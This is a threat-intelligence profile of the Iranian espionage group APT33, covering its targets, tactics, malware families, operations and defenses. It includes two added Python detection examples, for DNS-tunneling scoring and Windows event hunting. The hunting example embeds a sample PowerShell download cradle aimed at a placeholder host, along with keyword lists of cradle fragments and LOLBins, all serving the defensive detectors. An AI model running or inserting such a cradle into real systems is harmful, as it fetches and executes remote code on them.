
Introduction
APT33, also called Elfin, Refined Kitten, and Magnallium, is one of Iran’s most active and long-lasting cyber-espionage groups. The group has been operational since at least 2013 and has shown persistence in campaigns against targets in the aerospace, energy, and defense industries. Analysts associate APT33 with Iran’s Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS) and view its activities as consistent with Iran’s strategic and military ambitions. Over the last ten years, APT33 has shifted from disruptive wiper attacks to more advanced, deliberate, and sustained espionage campaigns aligned with Tehran’s geopolitical objectives.
APT33’s activities reflect the growing cyber maturity of the Iranian state, as well as its desire to compensate for limited conventional military capacity through asymmetric capabilities. The group focuses on intelligence collection operations, gaining economic advantage, and potentially conducting sabotage, which places it at the forefront of Iran’s cyber ecosystem alongside groups such as APT34 (OilRig), APT35 (Charming Kitten), and APT39 (Chafer).
Identity and Motivation
APT33 is thought to act under the supervision of the IRGC and has ties to the Iranian state’s military and intelligence apparatus. Its campaigns demonstrate dual-purpose motivation:
1. Strategic Espionage: Compromising the networks of defense contractors, aerospace manufacturers, and energy companies to acquire sensitive data that can support Iran’s industrial and military efforts.
2. Economic and Political Influence: Disrupting or surveilling adversaries in the Gulf region and Western countries to obtain insight into sanctions, energy production, and foreign policy.
The group’s main targets – defense and energy – are aligned with Iran’s strategic interests: protecting its oil and gas assets, enhancing its missile and aerospace capabilities, and countering Western influence in the Middle East.
Tactics, Techniques, and Procedures (TTPs)
APT33 displays the hallmarks of Iranian cyber-espionage: disciplined spearphishing, multi-stage intrusions, and heavy reliance on both private and open-source tools. Over time it has added identity compromise and cloud persistence to its repertoire.
1. Initial Access
APT33 primarily obtains initial access through spearphishing emails that impersonate legitimate corporate correspondence or job announcements from well-known aerospace and defense companies, such as Boeing or Northrop Grumman. Malicious attachments or links deploy initial loaders that ultimately install backdoors. APT33 also exploits vulnerabilities in public-facing applications and reuses credentials stolen in earlier breaches.
2. Persistence and Privilege Escalation
APT33 achieves persistence through web shells, scheduled tasks, and PowerShell-based backdoors. The group repeatedly reuses credentials and creates Active Directory accounts to keep long-term access to the network. APT33’s recent campaigns also show evidence of cloud-based persistence through malicious Azure Active Directory applications.
3. Command and Control (C2)
APT33 uses HTTPS, DNS tunneling, and proxy servers located in the Middle East and Europe for command and control communications with compromised systems. This regionally hosted infrastructure complicates attribution and supports continuity of operations.
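To make the DNS tunneling channel mentioned above concrete from the defender’s side, the following is an added example (not code from the article or from any vendor report on APT33) that scores a DNS query log for tunneling-style traffic. It flags a registered domain when many distinct subdomains appear under it and those subdomains are long and high-entropy, or when the traffic leans heavily on TXT records. The log, the domain names, the thresholds, and the naive registered-domain split (last two labels, no public-suffix list) are all constructed assumptions for illustration, not published APT33 indicators.

```python
"""Heuristic scoring of DNS query logs for tunneling-style C2 (added example)."""
import math
from collections import defaultdict

# Illustrative thresholds (assumptions, tune against your own baseline).
MIN_UNIQUE_SUBDOMAINS = 5   # distinct subdomains seen under one domain
MIN_MEAN_ENTROPY = 3.5      # bits per character of the subdomain part
MIN_MEAN_LENGTH = 20        # characters in the subdomain part
MIN_TXT_FRACTION = 0.5      # share of TXT queries, a common tunnel channel

# Constructed hex-like labels standing in for chunks of encoded data.
TUNNEL_LABELS = [
    "0123456789abcdef01234567", "fedcba9876543210fedcba98",
    "13579bdf02468ace13579bdf", "a1b2c3d4e5f6071829304a5b",
    "deadbeef0123456789abcdef", "cafef00d1122334455667788",
]

# Constructed sample log: (timestamp, client, qname, qtype). Not real data.
SAMPLE_QUERIES = [
    ("10:00:01", "10.1.2.3", "www.example.com", "A"),
    ("10:00:02", "10.1.2.3", "mail.example.com", "A"),
    ("10:00:03", "10.1.2.3", "cdn.example.com", "A"),
    ("10:00:04", "10.1.2.3", "www.example.com", "A"),
    ("10:00:05", "10.1.2.7", "login.example.org", "A"),
] + [
    ("10:01:%02d" % i, "10.1.2.9", f"{label}.example-update.net", "TXT")
    for i, label in enumerate(TUNNEL_LABELS)
]


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; 0 for empty or single-symbol strings."""
    if not text:
        return 0.0
    n = len(text)
    counts = {c: text.count(c) for c in set(text)}
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def split_qname(qname: str):
    """Split into (subdomain, registered_domain) using the last two labels.
    Simplification: a real deployment would use a public-suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_domains(queries):
    """Aggregate, per registered domain, the signals used for scoring."""
    subs = defaultdict(set)
    qtypes = defaultdict(list)
    for _ts, _client, qname, qtype in queries:
        sub, domain = split_qname(qname)
        qtypes[domain].append(qtype.upper())
        if sub:
            subs[domain].add(sub)
    profiles = {}
    for domain, types in qtypes.items():
        uniq = subs[domain]
        ents = [shannon_entropy(s) for s in uniq]
        lens = [len(s) for s in uniq]
        profiles[domain] = {
            "queries": len(types),
            "unique_subdomains": len(uniq),
            "mean_entropy": sum(ents) / len(ents) if ents else 0.0,
            "mean_length": sum(lens) / len(lens) if lens else 0.0,
            "txt_fraction": types.count("TXT") / len(types),
        }
    return profiles


def flag_tunneling_domains(queries):
    """Return, sorted by name, the domains whose subdomain traffic looks encoded."""
    flagged = []
    for domain, p in profile_domains(queries).items():
        enough = p["unique_subdomains"] >= MIN_UNIQUE_SUBDOMAINS
        encoded = (p["mean_entropy"] >= MIN_MEAN_ENTROPY
                   and p["mean_length"] >= MIN_MEAN_LENGTH)
        txt_heavy = p["txt_fraction"] >= MIN_TXT_FRACTION
        if enough and (encoded or txt_heavy):
            flagged.append(domain)
    return sorted(flagged)


if __name__ == "__main__":
    profiles = profile_domains(SAMPLE_QUERIES)
    for d in flag_tunneling_domains(SAMPLE_QUERIES):
        print("possible DNS tunnel:", d, profiles[d])
```

Run against the constructed log, only example-update.net is flagged: six distinct 24-character hex labels, average entropy near 3.9 bits per character, and every query a TXT lookup. The benign domains never reach the unique-subdomain minimum, which is what keeps ordinary CDN and mail lookups out of the alert queue; in production the same per-domain profile should be compared against a learned baseline rather than fixed constants.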
4. Malware Arsenal
APT33’s toolset comprises both wholly custom malware and malware shared among Iranian actors:
– DropShot: a loader that delivers additional payloads and maintains persistence.
– TurnedUp: a backdoor for exfiltration and monitoring.
– ALMA: an implant created in or around 2024 for espionage and credential exfiltration.
– Shamoon Association: links to the wiper malware family behind the 2016 attacks that destroyed large portions of Saudi energy infrastructure.
– PowerShell Scripts: utilities used for reconnaissance, lateral movement, and credential exfiltration.
APT33’s modular architecture allows components developed for one campaign to be reused in others.
5. Exfiltration and Destruction
Although its primary mission appears to be espionage, APT33 has a history of data destruction. In several incidents the actor deployed Shamoon-like disk-wiping malware to destroy data and disrupt critical infrastructure. Data is normally exfiltrated over encrypted (HTTPS) sessions or through cloud storage on private or public servers.
Notable Operations
APT33’s operational history shows both sophistication and agility, illustrating how Iranian state-sponsored actors evolve in service of national objectives.
- 2016 – Saudi Energy Attacks: Linked to destructive Shamoon-style incidents against Saudi petrochemical assets. The objective was to rapidly disrupt regional energy production during a period of elevated geopolitical tension.
- 2018 – Aerospace Espionage Campaign: Ran phishing attacks impersonating major aerospace and defense companies to penetrate U.S. and European supply chains. This campaign reflected Iran’s interest in aerospace and missile capabilities.
- 2021 – Academic Espionage: Targeted U.S. and European universities and research institutions engaged in aerospace and nuclear research, likely to repurpose stolen research for Iran’s domestic defense projects.
- 2024 – ALMA Backdoor Deployment: Introduced a new PowerShell-based implant in operations targeting defense contractors and logistics firms in North America and the Gulf region.
- 2025 – Energy Sector Reconnaissance: Initiated campaigns against energy and oilfield service companies, using phishing and credential harvesting to map industrial control networks.
These operations reflect a consistent focus on the energy and defense industries, in line with long-term objectives of self-sufficiency and strategic deterrence.
Evolution and Tradecraft
APT33’s development reflects the broader shift in Iranian proxy activity from destructive operations toward espionage and long-term access. Early APT33 campaigns were louder, easily attributable, and often left traces in network logs. Between 2023 and 2025, the group moved to quieter methods: identity-based attacks, improved modular implants, and stronger operational security (OPSEC).
Some key trends in their evolution include:
– Operational Segmentation: separate teams handle reconnaissance and initial access, lateral movement, and C2 infrastructure, which limits the exposure of any single stage.
– Cloud Adoption: APT33 began using Microsoft Azure and Microsoft 365 for persistence and lateral movement, mirroring the practice of Russian and Chinese groups.
– Closer Collaboration: Sharing tools and infrastructure with APT34 and MuddyWater to coordinate attacks supports the idea of a unified Iranian cyber command.
– Intelligence Collection Focus: APT33 has moved from outright destruction to strategic, long-term intelligence collection as a source of geopolitical leverage.
Strategic Impact and Defensive Recommendations
APT33’s ongoing targeting of the energy and defense sectors underscores the geopolitical nature of its cyber operations. APT33’s activity telegraphs Iran’s objectives of economic survival, regional influence, and technological parity with its adversaries.
Strategic Impact:
• Intellectual Property Theft: Information obtained from the aerospace and defense sectors could accelerate Iran’s domestic development programs.
• Threat to Critical Infrastructure: Targeting of the energy sector could allow Iran to pre-position malware for future attacks or disruption.
• Regional Power Projection: APT33 operations support Iran’s asymmetric strategy by exerting influence over regional issues without direct conflict with adversaries.
Defensive Recommendations:
1. Enhance Email Security: Deploy anti-phishing gateways, attachment sandboxing, and user awareness training.
2. Implement Multi-Factor Authentication (MFA): Require MFA for remote access and cloud services to mitigate credential theft.
3. Network Monitoring: Investigate anomalous PowerShell execution, lateral movement tooling, and the creation of new domain accounts.
4. Threat Hunting: Hunt for indicators of compromise and behavioural characteristics associated with the DropShot, TurnedUp, and ALMA malware families.
5. Information Sharing: Share intelligence between the energy and defense sectors on overlapping infrastructure linked to Iranian operations.
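The persistence section (scheduled tasks, PowerShell backdoors, new Active Directory accounts) and recommendation 3 above both come down to a handful of Windows Security-log events. The following is an added example, not code from the article or from any vendor, of hunting rules over constructed events that mimic the fields of event IDs 4688 (process creation with command line), 4720 (user account created) and 4698 (scheduled task created). The field names, the keyword lists, the provisioning allowlist and the sample events are illustrative assumptions, not published APT33 detections; the sample encoded command is built in code so that the decoder is exercised on a realistic value.

```python
"""Hunting rules over constructed Windows Security-log style events (added example)."""
import base64
import binascii
import re

# Fragments typical of PowerShell download cradles (assumed keyword list).
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|net\.webclient|"
    r"invoke-webrequest|frombase64string)\b", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by base64.
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.IGNORECASE)
# Interpreters and LOLBins whose presence in a task action warrants review.
TASK_INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                     "mshta", "regsvr32", "rundll32")
# Accounts expected to create domain users (assumed provisioning allowlist).
PROVISIONING_ACCOUNTS = {"CORP\\svc_provision"}


def encode_ps(script: str) -> str:
    """Base64 of the UTF-16LE script, the form -EncodedCommand expects.
    Used only to construct a realistic sample event below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample cradle (placeholder .invalid host) and events; not real telemetry.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p')"
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "ws01", "subject_user": "CORP\\jdoe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(SAMPLE_CRADLE)},
    {"event_id": 4688, "host": "ws01", "subject_user": "CORP\\jdoe",
     "command_line": "C:\\Windows\\System32\\notepad.exe C:\\Users\\jdoe\\notes.txt"},
    {"event_id": 4688, "host": "ws02", "subject_user": "CORP\\svc_inv",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"event_id": 4720, "host": "dc01", "subject_user": "CORP\\svc_provision",
     "target_user": "jsmith"},
    {"event_id": 4720, "host": "dc01", "subject_user": "CORP\\jdoe",
     "target_user": "backup_adm"},
    {"event_id": 4698, "host": "ws01", "subject_user": "CORP\\jdoe",
     "task_name": "\\Microsoft\\Windows\\Updates\\SyncCheck",
     "task_action": "powershell.exe -NoP -W Hidden -File C:\\Users\\Public\\sync.ps1"},
    {"event_id": 4698, "host": "srv01", "subject_user": "CORP\\svc_backup",
     "task_name": "\\Backup\\Nightly",
     "task_action": "C:\\Program Files\\Backup\\backup.exe --full"},
]


def _alert(rule, event, detail):
    return {"rule": rule, "event_id": event["event_id"],
            "host": event.get("host"), "detail": detail}


def decode_encoded_command(command_line: str):
    """Return the decoded script when the command line carries -EncodedCommand."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze_process(event: dict) -> list:
    """4688 rules: encoded PowerShell, download cradle, hidden window."""
    alerts = []
    cmd = event.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        alerts.append(_alert("encoded_powershell", event, decoded.strip()))
    # Search both the raw line and the decoded script for cradle keywords.
    if CRADLE_RE.search(cmd + " " + (decoded or "")):
        alerts.append(_alert("download_cradle", event, cmd))
    if HIDDEN_RE.search(cmd):
        alerts.append(_alert("hidden_window", event, cmd))
    return alerts


def analyze_account_creation(event: dict) -> list:
    """4720 rule: account created by someone outside the provisioning allowlist."""
    if event.get("subject_user") in PROVISIONING_ACCOUNTS:
        return []
    return [_alert("unexpected_account_creation", event,
                   f"{event.get('subject_user')} created {event.get('target_user')}")]


def analyze_scheduled_task(event: dict) -> list:
    """4698 rule: task action launches a script interpreter or LOLBin."""
    action = event.get("task_action", "").lower()
    if any(name in action for name in TASK_INTERPRETERS):
        return [_alert("suspicious_scheduled_task", event,
                       f"{event.get('task_name')} -> {event.get('task_action')}")]
    return []


HANDLERS = {4688: analyze_process, 4720: analyze_account_creation,
            4698: analyze_scheduled_task}


def hunt(events) -> list:
    """Run the matching handler over each event and collect every alert."""
    alerts = []
    for ev in events:
        handler = HANDLERS.get(ev.get("event_id"))
        if handler:
            alerts.extend(handler(ev))
    return alerts


if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(a["rule"], a["event_id"], a["host"], a["detail"][:80])
```

On the constructed events the encoded command line raises three alerts (encoded_powershell with the decoded cradle as detail, download_cradle, hidden_window), the account created by an ordinary user raises unexpected_account_creation, and the task whose action launches PowerShell raises suspicious_scheduled_task; the inventory script, the notepad launch, the provisioning account and the backup task produce nothing. Decoding the -EncodedCommand argument before keyword matching is the step that matters most here, since an encoded cradle shows nothing suspicious in the raw 4688 command line.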
Conclusion
APT33 remains one of Iran’s most effective and enduring cyber-espionage actors. Its decade-long history reflects a disciplined, strategic mission to support Iran’s military and industrial interests in cyberspace. From the early, destructive Shamoon-style campaigns to its current focus on cloud-based espionage, APT33 continues to advance in sophistication and capability.
As we look forward to 2025, APT33 illustrates Iran’s transition from less mature cyber operations to more mature and intelligence-based operations. APT33 operates in the intersection of espionage, economic warfare, and geopolitical competition. For defenders, understanding APT33’s evolving tactics and establishing sufficient identity, email, and cloud security controls will be key to defending against one of the Middle East’s most prolific cyber threats.